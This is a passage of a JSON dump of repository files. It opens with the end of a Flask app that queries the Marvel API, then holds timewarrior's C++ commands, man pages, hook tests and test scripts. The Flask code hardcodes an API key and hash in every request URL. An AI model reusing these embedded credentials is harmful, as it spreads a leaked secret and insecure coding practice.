result=json.loads(r.text))\r\n\r\n\r\[email protected]('/char/<string>')\r\ndef char(string):\r\n r = requests.get('https://gateway.marvel.com/v1/public/characters/'+string +\r\n '?ts=1&apikey=690e3ac16286c2de4591eca37269eedb&hash=fcbd875beb64e407e41ea8088ed2cd0c')\r\n comic = requests.get('https://gateway.marvel.com/v1/public/characters/'+string +\r\n '/comics?ts=1&apikey=690e3ac16286c2de4591eca37269eedb&hash=fcbd875beb64e407e41ea8088ed2cd0c')\r\n\r\n return render_template('char.html', result=json.loads(r.text), comics=json.loads(comic.text))\r\n\r\n\r\[email protected]('/char/page/<string>')\r\ndef page(string):\r\n\r\n r = requests.get('https://gateway.marvel.com/v1/public/characters?ts=1&apikey=690e3ac16286c2de4591eca37269eedb&hash=fcbd875beb64e407e41ea8088ed2cd0c&limit=100&offset='+str(int(string)*100))\r\n read = json.loads(r.text)\r\n\r\n next = int(string)+1\r\n prev = int(string)-1\r\n\r\n return render_template('page.html', result=read, number=next, prev=prev)\r\n\r\n\r\[email protected]('/comics/page/<string>')\r\ndef comics_page(string):\r\n r = requests.get('https://gateway.marvel.com/v1/public/comics?ts=1&apikey=690e3ac16286c2de4591eca37269eedb&hash=fcbd875beb64e407e41ea8088ed2cd0c&limit=100&offset='+str(int(string)*100))\r\n read = json.loads(r.text)\r\n\r\n next = int(string)+1\r\n prev = int(string)-1\r\n return render_template('comic.html', comics=read, number=next, prev=prev)\r\n\r\n\r\[email protected]('/comics/<string>')\r\ndef comics_id(string):\r\n r = requests.get('https://gateway.marvel.com/v1/public/comics/'+string +\r\n '?ts=1&apikey=690e3ac16286c2de4591eca37269eedb&hash=fcbd875beb64e407e41ea8088ed2cd0c')\r\n return render_template('comicinfo.html', result=json.loads(r.text))\r\n\r\n\r\[email protected]('/comicsearch', methods=['GET', 'POST'])\r\ndef comicsearch():\r\n if request.method == 'POST':\r\n Search = request.form['Search']\r\n\r\n r = requests.get(\r\n 'https://gateway.marvel.com/v1/public/comics?ts=1&apikey=690e3ac16286c2de4591eca37269eedb&hash=fcbd875beb64e407e41ea8088ed2cd0c&titleStartsWith='+Search)\r\n return render_template('comicsearch.html', comics=json.loads(r.text))\r\n\r\n return render_template('comicsearch.html')\r\n\r\n\r\[email protected]('/comicsearchyear', methods=['GET', 'POST'])\r\ndef comicsearchyear():\r\n if request.method == 'POST':\r\n Search = request.form['Search']\r\n year = request.form['Year']\r\n r = requests.get(\r\n 'https://gateway.marvel.com/v1/public/comics?ts=1&apikey=690e3ac16286c2de4591eca37269eedb&hash=fcbd875beb64e407e41ea8088ed2cd0c&titleStartsWith='+Search+'&startYear='+year)\r\n return render_template('comicsearch.html', comics=json.loads(r.text))\r\n return render_template('comicsearch.html')\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n app.run()\r\n" }, { "alpha_fraction": 0.7627118825912476, "alphanum_fraction": 0.7627118825912476, "avg_line_length": 28.5, "blob_id": "68eee55b00e1b1313e39e44e10ec97dcf672d63d", "content_id": "65f71f1d3fc4b1dd689b78376b458df1d3919822", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 59, "license_type": "no_license", "max_line_length": 49, "num_lines": 2, "path": "/README.md", "repo_name": "Ansh-Rathod/marvel-api", "src_encoding": "UTF-8", "text": "# marvel\nhttps://appi-rathod.herokuapp.com/ check out this\n" } ]
4
JacobJohansen/timewarrior
https://github.com/JacobJohansen/timewarrior
0f3e03aa1fb708184924b5fe7b670c1e8162886e
fc618636aacba6e52d447b482aeef58b375dfc8c
253d35f978b774c981f45d2d74fba5127db57e34
refs/heads/master
2023-08-27T01:16:48.426553
2021-05-27T19:16:13
2021-05-28T11:04:33
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6000694632530212, "alphanum_fraction": 0.6038916110992432, "avg_line_length": 29.294736862182617, "blob_id": "1c3b50a3abb9c26b78d1c9d3ab41d81930ebee16", "content_id": "3f592a23c62b1948871c3a4f6dd3f93569ddfb3c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2878, "license_type": "permissive", "max_line_length": 80, "num_lines": 95, "path": "/src/commands/CmdSplit.cpp", "repo_name": "JacobJohansen/timewarrior", "src_encoding": "UTF-8", "text": "////////////////////////////////////////////////////////////////////////////////\n//\n// Copyright 2016 - 2021, Thomas Lauf, Paul Beckingham, Federico Hernandez.\n//\n// Permission is hereby granted, free of charge, to any person obtaining a copy\n// of this software and associated documentation files (the \"Software\"), to deal\n// in the Software without restriction, including without limitation the rights\n// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n// copies of the Software, and to permit persons to whom the Software is\n// furnished to do so, subject to the following conditions:\n//\n// The above copyright notice and this permission notice shall be included\n// in all copies or substantial portions of the Software.\n//\n// THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\n// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n// THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n// SOFTWARE.\n//\n// https://www.opensource.org/licenses/mit-license.php\n//\n////////////////////////////////////////////////////////////////////////////////\n\n#include <cmake.h>\n#include <Duration.h>\n#include <format.h>\n#include <commands.h>\n#include <timew.h>\n#include <iostream>\n#include <stdlib.h>\n\n////////////////////////////////////////////////////////////////////////////////\nint CmdSplit (\n const CLI& cli,\n Rules& rules,\n Database& database,\n Journal& journal)\n{\n const bool verbose = rules.getBoolean (\"verbose\");\n\n std::set <int> ids = cli.getIds ();\n\n if (ids.empty ())\n {\n throw std::string (\"IDs must be specified. 
See 'timew help split'.\");\n }\n\n journal.startTransaction ();\n\n std::vector <Interval> intervals = getIntervalsByIds (database, rules, ids);\n\n // Apply tags to ids.\n for (const auto& interval : intervals)\n {\n Interval first = interval;\n Interval second = first;\n\n if (first.is_open ())\n {\n Datetime midpoint;\n midpoint -= (midpoint - first.start) / 2;\n first.end = midpoint;\n second.start = midpoint;\n }\n else\n {\n Datetime midpoint = first.start;\n midpoint += (first.end - first.start) / 2;\n first.end = midpoint;\n second.start = midpoint;\n }\n\n database.deleteInterval (interval);\n\n validate (cli, rules, database, first);\n database.addInterval (first, verbose);\n\n validate (cli, rules, database, second);\n database.addInterval (second, verbose);\n\n if (verbose)\n {\n std::cout << \"Split @\" << interval.id << '\\n';\n }\n }\n\n journal.endTransaction ();\n\n return 0;\n}\n\n////////////////////////////////////////////////////////////////////////////////\n" }, { "alpha_fraction": 0.7118644118309021, "alphanum_fraction": 0.7207425236701965, "avg_line_length": 27.159090042114258, "blob_id": "5b904ab4372a31620e5b9b81620381ba054d156f", "content_id": "c725f8b7e59472caecd5b4c6e0701a6797d4903f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "AsciiDoc", "length_bytes": 1239, "license_type": "permissive", "max_line_length": 116, "num_lines": 44, "path": "/doc/man1/timew-annotate.1.adoc", "repo_name": "JacobJohansen/timewarrior", "src_encoding": "UTF-8", "text": "= timew-annotate(1)\n\n== NAME\ntimew-annotate - add an annotation to intervals\n\n== SYNOPSIS\n[verse]\n*timew annotate* [_<id>_**...**] _<annotation>_**...**\n\n== DESCRIPTION\nThe 'annotate' command is used to add an annotation to an interval.\nUsing the 'summary' command, and specifying the ':ids' hint shows interval IDs.\nUsing the right ID, you can identify an interval to annotate.\n\n== EXAMPLES\nFor example, show the IDs:\n\n $ timew summary :week :ids\n\nThen having selected '@2' as the interval you wish to annotate:\n\n $ timew annotate @2 'Lorem ipsum...'\n\nNote that you can annotate multiple intervals with the same annotation:\n\n $ timew annotate @2 @10 @23 'Lorem ipsum dolor sit amet...'\n\nIf there is active time tracking, you can omit the ID when you want to add annotations to the current open interval:\n\n $ timew start foo\n $ timew annotate bar\n\nThis results in the current interval having annotations 'foo' and 'bar'.\n\n== BUGS\nCurrently the annotation command picks the last token from the command line and uses it as annotation.\nI.e. 
using no quotes in an annotation command like\n\n $ timew annotate @1 lorem ipsum dolor\n\nwill result in interval @1 having only 'dolor' as its annotation.\n\n== SEE ALSO\n**timew-tag**(1)\n" }, { "alpha_fraction": 0.5154243111610413, "alphanum_fraction": 0.651758074760437, "avg_line_length": 46.825111389160156, "blob_id": "8f21d1739bcf4b5992a90f195891eaa6f53c1c48", "content_id": "8362f1a5f1327cfc2740be8aec6be1fcf3befeb4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10665, "license_type": "permissive", "max_line_length": 242, "num_lines": 223, "path": "/test/test_on-modify.timewarrior.t", "repo_name": "JacobJohansen/timewarrior", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\n###############################################################################\n#\n# Copyright 2019 - 2020, Thomas Lauf, Paul Beckingham, Federico Hernandez.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included\n# in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\n# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n# https://www.opensource.org/licenses/mit-license.php\n#\n###############################################################################\n\nimport os\nimport subprocess\nimport unittest\n\nimport sys\n\n# Ensure python finds the local simpletap module\nsys.path.append(os.path.dirname(os.path.abspath(__file__)))\n\nfrom basetest import Timew, TestCase\n\n\nclass TestOnModifyHookScript(TestCase):\n def setUp(self):\n current_dir = os.path.dirname(os.path.abspath(__file__))\n self.t = Timew()\n\n self.process = subprocess.Popen([os.path.join(current_dir, '../ext/on-modify.timewarrior')],\n env={\n 'PATH': '../src:' + os.environ['PATH'],\n 'TIMEWARRIORDB': self.t.datadir\n },\n shell=True,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n def test_hook_should_process_annotate(self):\n \"\"\"on-modify hook should process 'task annotate'\"\"\"\n self.t(\"start 10min ago Foo\")\n\n out, err = self.process.communicate(input=b\"\"\"\\\n{\"description\":\"Foo\",\"entry\":\"20190820T201911Z\",\"modified\":\"20190820T201911Z\",\"start\":\"20190820T201911Z\",\"status\":\"pending\",\"uuid\":\"3495a755-c4c6-4106-aabe-c0d3d128b65a\"}\n{\"description\":\"Foo\",\"entry\":\"20190820T201911Z\",\"modified\":\"20190820T201911Z\",\"start\":\"20190820T201911Z\",\"status\":\"pending\",\"uuid\":\"3495a755-c4c6-4106-aabe-c0d3d128b65a\",\"annotations\":[{\"entry\":\"20190820T201911Z\",\"description\":\"Annotation\"}]}\n\"\"\")\n\n self.assertEqual(bytes(b''), err)\n\n j = self.t.export()\n self.assertEqual(len(j), 
1)\n self.assertOpenInterval(j[0], expectedTags=[\"Foo\"], expectedAnnotation=\"Annotation\")\n\n def test_hook_should_process_append(self):\n \"\"\"on-modify hook should process 'task append'\"\"\"\n self.t(\"start 10min ago Foo\")\n\n out, err = self.process.communicate(input=b\"\"\"\\\n{\"description\":\"Foo\",\"entry\":\"20190820T201911Z\",\"modified\":\"20190820T201911Z\",\"start\":\"20190820T201911Z\",\"status\":\"pending\",\"uuid\":\"da603270-ce2b-4a5a-9273-c67c2d2d0067\"}\n{\"description\":\"Foo Bar\",\"entry\":\"20190820T201911Z\",\"modified\":\"20190820T201911Z\",\"start\":\"20190820T201911Z\",\"status\":\"pending\",\"uuid\":\"da603270-ce2b-4a5a-9273-c67c2d2d0067\"}\n\"\"\")\n\n self.assertEqual(bytes(b''), err)\n\n j = self.t.export()\n self.assertEqual(len(j), 1)\n self.assertOpenInterval(j[0], expectedTags=[\"Foo Bar\"])\n\n def test_hook_should_process_delete(self):\n \"\"\"on-modify hook should process 'task delete'\"\"\"\n self.t(\"start 10min ago Foo\")\n\n out, err = self.process.communicate(input=b\"\"\"\\\n{\"description\":\"Foo\",\"entry\":\"20190820T201911Z\",\"modified\":\"20190820T201911Z\",\"start\":\"20190820T201911Z\",\"status\":\"pending\",\"uuid\":\"25b66283-96e0-42b4-b835-8efd0ea1043c\"}\n{\"description\":\"Foo\",\"end\":\"20190820T201911Z\",\"entry\":\"20190820T201911Z\",\"modified\":\"20190820T201911Z\",\"start\":\"20190820T201911Z\",\"status\":\"deleted\",\"uuid\":\"25b66283-96e0-42b4-b835-8efd0ea1043c\"}\n\"\"\")\n\n self.assertEqual(bytes(b''), err)\n\n j = self.t.export()\n self.assertEqual(len(j), 1)\n self.assertClosedInterval(j[0], expectedTags=[\"Foo\"])\n\n def test_hook_should_process_denotate(self):\n \"\"\"on-modify hook should process 'task denotate'\"\"\"\n self.t(\"start 10min ago Foo\")\n self.t(\"annotate @1 Annotation\")\n\n out, err = self.process.communicate(input=b\"\"\"\\\n{\"description\":\"Foo\",\"entry\":\"20190820T201911Z\",\"modified\":\"20190820T201911Z\",\"start\":\"20190820T201911Z\",\"status\":\"pending\",\"uuid\":\"8811cc93-a495-4fa6-993e-2b96cffc48e0\",\"annotations\":[{\"entry\":\"20190820T201911Z\",\"description\":\"Annotation\"}]}\n{\"description\":\"Foo\",\"entry\":\"20190820T201911Z\",\"modified\":\"20190820T201911Z\",\"start\":\"20190820T201911Z\",\"status\":\"pending\",\"uuid\":\"8811cc93-a495-4fa6-993e-2b96cffc48e0\"}\n\"\"\")\n\n self.assertEqual(bytes(b''), err)\n\n j = self.t.export()\n self.assertEqual(len(j), 1)\n self.assertOpenInterval(j[0], expectedTags=[\"Foo\"], expectedAnnotation=\"\")\n\n def test_hook_should_process_done(self):\n \"\"\"on-modify hook should process 'task done'\"\"\"\n self.t(\"start 10min ago Foo\")\n\n out, err = self.process.communicate(input=b\"\"\"\\\n{\"description\":\"Foo\",\"entry\":\"20190820T201912Z\",\"modified\":\"20190820T201912Z\",\"start\":\"20190820T201912Z\",\"status\":\"pending\",\"uuid\":\"c418b958-5c3c-4633-89a4-4a2f678d74d0\"}\n{\"description\":\"Foo\",\"end\":\"20190820T201912Z\",\"entry\":\"20190820T201912Z\",\"modified\":\"20190820T201912Z\",\"status\":\"completed\",\"uuid\":\"c418b958-5c3c-4633-89a4-4a2f678d74d0\"}\n\"\"\")\n\n self.assertEqual(b'', err)\n\n j = self.t.export()\n self.assertEqual(len(j), 1)\n self.assertClosedInterval(j[0], expectedTags=[\"Foo\"])\n\n def test_hook_should_process_modify_desc(self):\n \"\"\"on-modify hook should process 'task modify' for changing description\"\"\"\n self.t(\"start 10min ago Foo\")\n\n out, err = 
self.process.communicate(input=b\"\"\"\\\n{\"description\":\"Foo\",\"entry\":\"20190820T203416Z\",\"modified\":\"20190820T203416Z\",\"start\":\"20190820T203416Z\",\"status\":\"pending\",\"uuid\":\"189e6745-04e0-4b17-949f-900cf63ab8d9\"}\n{\"description\":\"Bar\",\"entry\":\"20190820T203416Z\",\"modified\":\"20190820T203416Z\",\"start\":\"20190820T203416Z\",\"status\":\"pending\",\"uuid\":\"189e6745-04e0-4b17-949f-900cf63ab8d9\"}\n\"\"\")\n\n self.assertEqual(bytes(b''), err)\n\n j = self.t.export()\n self.assertEqual(len(j), 1)\n self.assertOpenInterval(j[0], expectedTags=[\"Bar\"])\n\n def test_hook_should_process_modify_tags(self):\n \"\"\"on-modify hook should process 'task modify' for changing tags\"\"\"\n self.t(\"start 10min ago Foo Tag Bar\")\n\n out, err = self.process.communicate(input=b\"\"\"\\\n{\"description\":\"Foo\",\"entry\":\"20190820T203620Z\",\"modified\":\"20190820T203620Z\",\"start\":\"20190820T203620Z\",\"status\":\"pending\",\"tags\":[\"Tag\",\"Bar\"],\"uuid\":\"6cab88f0-ac12-4a87-995a-0e7d39810c05\"}\n{\"description\":\"Foo\",\"entry\":\"20190820T203620Z\",\"modified\":\"20190820T203620Z\",\"start\":\"20190820T203620Z\",\"status\":\"pending\",\"tags\":[\"Tag\",\"Baz\"],\"uuid\":\"6cab88f0-ac12-4a87-995a-0e7d39810c05\"}\n\"\"\")\n\n self.assertEqual(bytes(b''), err)\n\n j = self.t.export()\n self.assertEqual(len(j), 1)\n self.assertOpenInterval(j[0], expectedTags=[\"Foo\", \"Tag\", \"Baz\"])\n\n def test_hook_should_process_modify_project(self):\n \"\"\"on-modify hook should process 'task modify' for changing project\"\"\"\n self.t(\"start Foo dummy\")\n\n out, err = self.process.communicate(input=b\"\"\"\\\n{\"description\":\"Foo\",\"entry\":\"20190820T203842Z\",\"modified\":\"20190820T203842Z\",\"project\":\"dummy\",\"start\":\"20190820T203842Z\",\"status\":\"pending\",\"uuid\":\"d95dc7a0-6189-4692-b58a-4ab60d539c8d\"}\n{\"description\":\"Foo\",\"entry\":\"20190820T203842Z\",\"modified\":\"20190820T203842Z\",\"project\":\"test\",\"start\":\"20190820T203842Z\",\"status\":\"pending\",\"uuid\":\"d95dc7a0-6189-4692-b58a-4ab60d539c8d\"}\n\"\"\")\n\n self.assertEqual(b'', err)\n\n j = self.t.export()\n self.assertEqual(len(j), 1)\n self.assertOpenInterval(j[0], expectedTags=[\"Foo\", \"test\"])\n\n def test_hook_should_process_prepend(self):\n \"\"\"on-modify hook should process 'task prepend'\"\"\"\n self.t(\"start 10min ago Foo\")\n\n out, err = self.process.communicate(input=b\"\"\"\\\n{\"description\":\"Foo\",\"entry\":\"20190820T203842Z\",\"modified\":\"20190820T203842Z\",\"start\":\"20190820T203842Z\",\"status\":\"pending\",\"uuid\":\"02bc8839-b304-49f9-ac1a-29ac4850583f\"}\n{\"description\":\"Prefix Foo\",\"entry\":\"20190820T203842Z\",\"modified\":\"20190820T203842Z\",\"start\":\"20190820T203842Z\",\"status\":\"pending\",\"uuid\":\"02bc8839-b304-49f9-ac1a-29ac4850583f\"}\n\"\"\")\n\n self.assertEqual(bytes(b''), err)\n\n j = self.t.export()\n self.assertEqual(len(j), 1)\n self.assertOpenInterval(j[0], expectedTags=[\"Prefix Foo\"])\n\n def test_hook_should_process_start(self):\n \"\"\"on-modify hook should process 'task start'\"\"\"\n out, err = self.process.communicate(input=b\"\"\"\\\n{\"description\":\"Foo\",\"entry\":\"20190820T203842Z\",\"modified\":\"20190820T203842Z\",\"status\":\"pending\",\"uuid\":\"16af44c5-57d2-43bf-97ed-cf2e541d927f\"}\n{\"description\":\"Foo\",\"entry\":\"20190820T203842Z\",\"modified\":\"20190820T203842Z\",\"start\":\"20190820T203842Z\",\"status\":\"pending\",\"uuid\":\"16af44c5-57d2-43bf-97ed-cf2e541d927f\"}\n\"\"\")\n\n 
self.assertEqual(bytes(b''), err)\n\n j = self.t.export()\n self.assertEqual(len(j), 1)\n self.assertOpenInterval(j[0], expectedTags=[\"Foo\"])\n\n def test_hook_should_process_stop(self):\n \"\"\"on-modify hook should process 'task stop'\"\"\"\n self.t(\"start 10min ago Foo\")\n\n out, err = self.process.communicate(input=b\"\"\"\\\n{\"description\":\"Foo\",\"entry\":\"20190820T203842Z\",\"modified\":\"20190820T203842Z\",\"start\":\"20190820T203842Z\",\"status\":\"pending\",\"uuid\":\"13f83e99-f6a2-4857-9e00-bdeede064772\"}\n{\"description\":\"Foo\",\"entry\":\"20190820T203842Z\",\"modified\":\"20190820T203842Z\",\"status\":\"pending\",\"uuid\":\"13f83e99-f6a2-4857-9e00-bdeede064772\"}\n\"\"\")\n\n self.assertEqual(bytes(b''), err)\n\n j = self.t.export()\n self.assertEqual(len(j), 1)\n self.assertClosedInterval(j[0], expectedTags=[\"Foo\"])\n\n\nif __name__ == \"__main__\":\n from simpletap import TAPTestRunner\n unittest.main(testRunner=TAPTestRunner())\n" }, { "alpha_fraction": 0.6807453632354736, "alphanum_fraction": 0.6919254660606384, "avg_line_length": 23.393939971923828, "blob_id": "21abca2ba36e0c3b7f03245e44d3ab8caf04cf33", "content_id": "b610cc778625d624ed0b0cd03cd47a86af61b94a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "AsciiDoc", "length_bytes": 805, "license_type": "permissive", "max_line_length": 91, "num_lines": 33, "path": "/doc/man1/timew-summary.1.adoc", "repo_name": "JacobJohansen/timewarrior", "src_encoding": "UTF-8", "text": "= timew-summary(1)\n\n== NAME\ntimew-summary - display a time-tracking summary\n\n== SYNOPSIS\n[verse]\n*timew summary* [_<range>_] [_<tag>_**...**]\n\n== DESCRIPTION\nDisplays a report summarizing tracked and untracked time for the current day by default.\nAccepts date ranges and tags for filtering, or shortcut hints:\n\n $ timew summary monday - today\n $ timew summary :week\n $ timew summary :month\n\nThe ':ids' hint adds an 'ID' column to the summary report output for interval modification.\n\n== CONFIGURATION\n**reports.summary.holidays**::\nDetermines whether relevant holidays are shown beneath the report.\nDefault value is 'yes'.\n\n== SEE ALSO\n**timew-day**(1),\n**timew-lengthen**(1),\n**timew-modify**(1),\n**timew-month**(1),\n**timew-shorten**(1),\n**timew-tag**(1),\n**timew-untag**(1),\n**timew-week**(1)\n" }, { "alpha_fraction": 0.7355555295944214, "alphanum_fraction": 0.7377777695655823, "avg_line_length": 25.47058868408203, "blob_id": "a3fd1029d217316db8e799251a11dd48ea2db49e", "content_id": "d3ceedff39371509623bce1fc4fdb69323f1b430", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "AsciiDoc", "length_bytes": 1350, "license_type": "permissive", "max_line_length": 152, "num_lines": 51, "path": "/doc/man7/timew-config.7.adoc", "repo_name": "JacobJohansen/timewarrior", "src_encoding": "UTF-8", "text": "= timew-config(7)\n\n== NAME\ntimew-config - Timewarrior configuration file and override options\n\n== SYNOPSIS\n**timew rc.**__<name>__**=**__<value>__ _<command>_\n\n== DESCRIPTION\nTimewarrior stores its configuration in the user's home directory in _~/.timewarrior/timewarrior.cfg_.\nThis file contains a mix of rules and configuration settings.\nNote that the TIMEWARRIORDB environment variable can be set to override this location.\n\nThe values 'true', '1', 'y', 'yes' and 'on' are all equivalent and enable a setting.\nAny other value means disable the setting.\n\nDefault values may be overridden by timewarrior.cfg values, which may in turn be 
overridden on the command line using: **rc.**__<name>__**=**__<value>__\n\nFor example, to turn off verbose mode:\n\n rc.verbose=0\n\nNote that hints can also do this (:quiet).\n\n== CONFIGURATION\n\n*confirmation*::\nDetermines whether harmful operations require interactive confirmation.\n+\nMay be overridden by the ':yes' hint.\n+\nDefault value is 'yes'.\n\n*verbose*::\nDetermines whether Timewarrior generates feedback.\n+\nMay be overridden by the ':quiet' hint.\n+\nDefault value is 'yes'.\n\n*debug*::\nDetermines whether diagnostic debugging information is shown.\n+\nUseful for troubleshooting, but not for general use.\n+\nDefault value is 'off'.\n\n*debug.indicator*::\nThe debug output prefix string.\n+\nDefault value is '>>'.\n" }, { "alpha_fraction": 0.44556325674057007, "alphanum_fraction": 0.4669603407382965, "avg_line_length": 17.05681800842285, "blob_id": "9bab93fa48251624fe0fad8b401995d91fe2de19", "content_id": "45f128e420fcdb68bae0b0fae28cb27b3d233119", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1589, "license_type": "permissive", "max_line_length": 60, "num_lines": 88, "path": "/test/timemachine", "repo_name": "JacobJohansen/timewarrior", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nfunction default_dates()\n{\n case \"${OSTYPE}\" in\n darwin*)\n date \"+%Y-%m-%d\"\n ;;\n *)\n date --rfc-3339=date\n ;;\n esac\n}\n\nfunction default_minutes()\n{\n case \"${OSTYPE}\" in\n darwin*)\n echo \"0$( jot -r 1 0 59 )\" | sed -E \"s|.+(..)|\\1|g\"\n ;;\n *)\n echo \"0$( rand -M 60 )\" | sed \"s|.\\+\\(..\\)\\$|\\1|g\"\n ;;\n esac\n}\n\nfunction default_hours()\n{\n seq -w 0 23\n}\n\nif ! command -v faketime >/dev/null 2>&1 ; then\n echo \"timemachine requires libfaketime to be installed!\"\n exit 1\nfi\n\n# parse options/arguments\nuntil [[ -z \"${1}\" ]] ; do\n case \"${1}\" in\n --minute)\n shift\n minutes=\"${minutes} ${1}\"\n ;;\n --minutes)\n shift\n minutes=\"${1}\"\n ;;\n --hour)\n shift\n hours=\"${hours} ${1}\"\n ;;\n --hours)\n shift\n hours=\"${1}\"\n ;;\n --date)\n shift\n dates=\"${dates} ${1}\"\n ;;\n --fail-at-end)\n fail_at_end=1\n ;;\n -*)\n echo \"Unknown option '${1}'\"\n exit 1\n ;;\n *)\n tests=\"${tests} ${1}\"\n ;;\n esac\n shift\ndone\n\nfor date in ${dates-$( default_dates )} ; do\n for hour in ${hours-$( default_hours )} ; do\n for minute in ${minutes-$( default_minutes )} ; do\n date_time=\"${date}T${hour}:${minute}\"\n for single_test in ${tests} ; do\n echo \"Running test ${single_test} at ${date_time}\"\n\n if ! 
faketime \"${date_time}\" \"${single_test}\" ; then\n echo \"Test ${single_test} broke at ${date_time}!\"\n [[ ${fail_at_end-0} -ne 0 ]] || break 2\n fi\n done\n done\n done\ndone\n" }, { "alpha_fraction": 0.6812933087348938, "alphanum_fraction": 0.6836027503013611, "avg_line_length": 24.47058868408203, "blob_id": "d8025c1d9167cd09f7226beb39b55a8fdcb792bc", "content_id": "6c0009332999b1d4584f4086b4d731dce5a9df6d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "AsciiDoc", "length_bytes": 433, "license_type": "permissive", "max_line_length": 92, "num_lines": 17, "path": "/doc/man1/timew-report.1.adoc", "repo_name": "JacobJohansen/timewarrior", "src_encoding": "UTF-8", "text": "= timew-report(1)\n\n== NAME\ntimew-report - run an extension report\n\n== SYNOPSIS\n[verse]\n*timew* [*report*] _<report>_ [_<range>_] [_<tag>_**...**]\n\n== DESCRIPTION\nRuns an extension report, and supports filtering data.\nThe 'report' command itself is optional, which means that these two commands are equivalent:\n\n $ timew report foo :week\n $ timew foo :week\n\nThis does however assume there is a 'foo' extension installed.\n" }, { "alpha_fraction": 0.6258992552757263, "alphanum_fraction": 0.6294963955879211, "avg_line_length": 18.85714340209961, "blob_id": "f27a9fc09a64a14ba9a20a0ece543a21cfb5bd2b", "content_id": "b1f6f8ffa01c8c342db46d5f4f5e01beb72a4a06", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 278, "license_type": "permissive", "max_line_length": 66, "num_lines": 14, "path": "/test/AtomicFile.t", "repo_name": "JacobJohansen/timewarrior", "src_encoding": "UTF-8", "text": "#!/bin/sh\nBASEDIR=$(dirname \"$0\")\n\nif [ \"$(uname -s)\" = \"Darwin\" ] ; then\n DLL_TOOL=\"otool -L\"\nelse\n DLL_TOOL=\"ldd\"\nfi\n\nif ${DLL_TOOL} ${BASEDIR}/AtomicFileTest | grep -q 'libfiu' ; then\n exec fiu-run -x ${BASEDIR}/AtomicFileTest\nelse\n exec ${BASEDIR}/AtomicFileTest\nfi\n" }, { "alpha_fraction": 0.5545921921730042, "alphanum_fraction": 0.5622993111610413, "avg_line_length": 28.239437103271484, "blob_id": "861fb2d7aacfdaab4fd79f13c40744a64690c292", "content_id": "0d45d05fa8be5b60e5bb862b6fec485049ee2f32", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6228, "license_type": "permissive", "max_line_length": 103, "num_lines": 213, "path": "/src/commands/CmdSummary.cpp", "repo_name": "JacobJohansen/timewarrior", "src_encoding": "UTF-8", "text": "////////////////////////////////////////////////////////////////////////////////\n//\n// Copyright 2016 - 2021, Thomas Lauf, Paul Beckingham, Federico Hernandez.\n//\n// Permission is hereby granted, free of charge, to any person obtaining a copy\n// of this software and associated documentation files (the \"Software\"), to deal\n// in the Software without restriction, including without limitation the rights\n// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n// copies of the Software, and to permit persons to whom the Software is\n// furnished to do so, subject to the following conditions:\n//\n// The above copyright notice and this permission notice shall be included\n// in all copies or substantial portions of the Software.\n//\n// THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\n// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
